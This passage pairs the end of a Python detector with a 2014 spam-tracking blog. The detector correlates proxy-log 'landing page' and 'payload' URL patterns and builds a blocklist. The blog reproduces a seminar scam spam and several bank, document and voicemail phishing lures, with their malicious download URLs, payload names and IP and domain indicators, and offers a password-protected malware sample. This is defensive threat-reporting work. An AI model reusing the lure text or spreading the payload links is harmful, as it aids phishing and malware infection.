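# Payload fetched from a directory of the same shape.
PAYLOAD_RE = re.compile(r'^/(?P<dir>[a-z]{10})/[^/]+\.(?:zip|scr|exe)$', re.IGNORECASE)


def classify(url):
    """Return (kind, host, directory) where kind is 'landing', 'payload' or None."""
    parsed = urlparse(url)
    m = LANDING_RE.match(parsed.path)
    if m:
        return "landing", parsed.hostname, m.group("dir")
    m = PAYLOAD_RE.match(parsed.path)
    if m:
        return "payload", parsed.hostname, m.group("dir")
    return None, parsed.hostname, None


def correlate(log_text):
    """Walk the log in order; escalate when a client fetches a payload from a
    directory in which it has already hit a landing page."""
    seen_landing = defaultdict(set)   # client -> {(host, directory)}
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue                   # skip malformed lines rather than abort
        ts, client, url = parts
        kind, host, directory = classify(url)
        if kind == "landing":
            seen_landing[client].add((host, directory))
            alerts.append({"ts": ts, "client": client, "host": host, "url": url,
                           "severity": "medium", "reason": "landing page pattern"})
        elif kind == "payload" and (host, directory) in seen_landing[client]:
            alerts.append({"ts": ts, "client": client, "host": host, "url": url,
                           "severity": "high", "reason": "payload fetched after landing page"})
    return alerts


def hosts_to_block(alerts):
    """Distinct hosts involved in any alert, for a proxy or DNS blocklist."""
    return sorted({a["host"] for a in alerts})


if __name__ == "__main__":
    found = correlate(SAMPLE_PROXY_LOG)
    for a in found:
        print(a["severity"], a["client"], a["reason"], a["url"])
    print("block:", hosts_to_block(found))
```

A payload fetch with no preceding landing page from the same client is ignored here by design, since the author's observation is the pairing of the two; on a busy proxy you would want that lone fetch reported at medium as well.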
Wednesday 24 September 2014
More spam from the "Institute of Project Management America" (instituteofprojectmanagementamerica.org)
I've been on the case of the individuals spamming for IPMA (and before that NAPPPA) for some time, but it is disappointing to see that they are still pushing their fake seminars such as this one.
From: Institute of Project Management America [announcements@ipma8.org]
Date: 24 September 2014 06:36
Subject: Project Management Masters Certification Program (October 28-31, 2014: University of Portland)
The Project Management Masters Certification Program will be offered October 28-31, 2014 in Portland, Oregon. Project management professionals, business and technology professionals, students, and educators are invited to register at the Institute of Project Management America website here.
October 28-31, 2014
University of Portland
Portland, Oregon
The PMMC is designed for those seeking professional project management certification. It serves as both a thorough professional education and recognized certification. Those seeking additional credentials such as the PMP®/PgMP®, PMI-SP®, and PMI-RMP® will benefit from this dynamic and interactive work session, while those currently holding credentials will find the certification to be an enhancement as well as the most up to date advanced professional development.
Project Management Masters Certification program provides 36 hours of project management education, meeting education requirements for both PMI's Certified Associate in Project Management (CAPM) ® and Project Management Professional (PMP) certifications. Additionally, the Master Certification provides 36 Professional Development Units (PDUs) for current holders of PMP®/PgMP®, PMI-SP®, and PMI-RMP® credentials.
The program meets the education requirement for all professional designations through the Project Management Institute and other professional agencies. Additionally, the program awards 3.6 Continuing Education Units (CEUs) upon request.
Program Description
Our certificate program teaches technical and business professionals how to master the critical skills of project management techniques as part of their technical career development.
The skills developed in the Project Management Masters Certification program apply to large and small projects, product design and development efforts, construction projects, IT projects, software development, and any project with critical performance, time, and budget targets.
Our approach to project management education offers proven, results-focused learning.
Courses are developed and facilitated by professional subject experts with extensive industrial experience.
Course emphasis is on providing practical skills and tools supported by relevant case examples.
Tuition
Tuition for the four-day Project Management Masters Certification program is $995.00
Program Schedule and Content
1. Project Initiation, Costing, and Selection, Day 1
2. Project Organization and Leadership, Day 2
3. Detailed Project Planning, Day 2 and 3
4. Project Monitoring and Control, Day 3 and 4
5. Project Risk Management, Day 4
Benefits
· A PMMC certificate of accomplishment is awarded upon completion of the four day program of five courses. Completion letters are given for each course.
· Our instructors have extensive industrial experience. They focus on providing you with practical skills and tools using relevant case examples.
· Each class is highly focused and promotes maximum interaction.
· You can network with other project management professionals from a variety of industries.
· Earn Professional Development Units (PDUs) for maintenance of certification under the PMI Continuing Certification Requirements Program.
· Applicants for PMI's Certified Associate in Project Management (CAPM)® and Project Management Professional (PMP) certifications will have met all education requirements for eligibility.
Registration
Participants may reserve a seat online at the Institute of Project Management America website, by calling the Program Office toll-free at (888) 859-5659, or by sending their name and contact information via email the Program Registrar .
Upon receiving your registration, a confirmation email is sent to registrants that include session site information, travel information, program description, and details on how to confirm attendance and make payment arrangements.
Click HERE to unsubscribe from this mailing list.
The people who run this have a very poor reputation for both the quality of the courses and not paying monies owed. Often they claim that the course is being run at a prestigious location, but at the last moment the venue changes to somewhere a lot cheaper. The last spam I received advertising a course at Seattle Public Library in August attracted this comment:
As the person who helps run the calendar at Seattle Public Library, I can assure you that they do not have space secured here for their "training". They never returned the contract or payment.
In this case the spam originates from 173.55.195.165 (a Verizon customer in Hacienda Heights, California) using a "from" address of announcements@ipma8.org and spamvertising the domain instituteofprojectmanagementamerica.org.
The following IPs and domains are all connected to this spam run:
91.236.75.132
104.128.224.126
104.128.225.55
172.245.33.189
grantfundingusa.org
instituteofprojectmanagementamerica.org
ipma2014.org
projectmanagementusa.org
ipma2.org
ipma3.org
ipma5.org
ipma6.org
ipma7.org
ipma8.org
ipma9.org
ipma10.org
ipma11.org
ipma12.org
My personal belief is that this so-called Institute is a complete scam and it should be avoided.
"You have received a new secure message from BankLine" spam leads to undetected malware
From: Bankline [secure.message@bankline.com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
http://ismashahalam.net/xyzpayohjx/ngkzoeqjjs.html
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 7941.
First time users - will need to register after opening the attachment.
About Email Encryption - https://supportcentre.Bankline.com/app/answers/detail/a_id/1671/kw/secure%20message
The link in the email goes to ismashahalam.net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam.net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50.
The Anubis report shows that the malware phones home to very-english.co.uk which is worth blocking or monitoring.
For research purposes only, a copy of the malicious executable can be downloaded from here [zip]. The password is foray307.
Tuesday 23 September 2014
Malicious "Employee Documents - Internal Use" spam spoofs victim's domain
This spam appears to come from the victim's own domain, but in fact doesn't and it leads to malware instead.
From: victimdomain.com [INTERNAL@victimdomain.com]
To: victim@victimdomain.com
Date: 23 September 2014 11:43
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents
DOCUMENT LINK: http://cystersi.wagrowiec.pl/bitusagezp/paqzdzsfjs.html
Documents are encrypted in transit and store in a secure repository
---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential. If you received this transmission in error, please notify the sender by reply email and delete the message and any attachments.
In this case the link goes to cystersi.wagrowiec.pl/bitusagezp/paqzdzsfjs.html and then downloads a file from cystersi.wagrowiec.pl/bitusagezp/EmployeeDocuments.zip which unzips to a malicious executable EmployeeDocuments.scr. This is exactly the same payload as found in this spam run earlier today.
According to this spam.. "You have a new voice". Really?
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link below: http://www.ezysoft.in/ocjnvzulsx/begmnbjiae.html
The link to this secure message will expire in 24 hours. If you would like to save a copy of the email or attachment, please save from the opened encrypted email. If an attachment is included, you will be given the option to download a copy of the attachment to your computer.
Hang on.. cough cough.. la la la la la la.. testing testing. Nope, my voice sounds pretty much the same as it usually does.
The link in the email downloads a file from www.ezysoft.in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54.
According to this Anubis report the malware attempts to phone home to very-english.co.uk which might be worth blocking.
Labels:
Malware,
Spam,
Viruses,
Voice Mail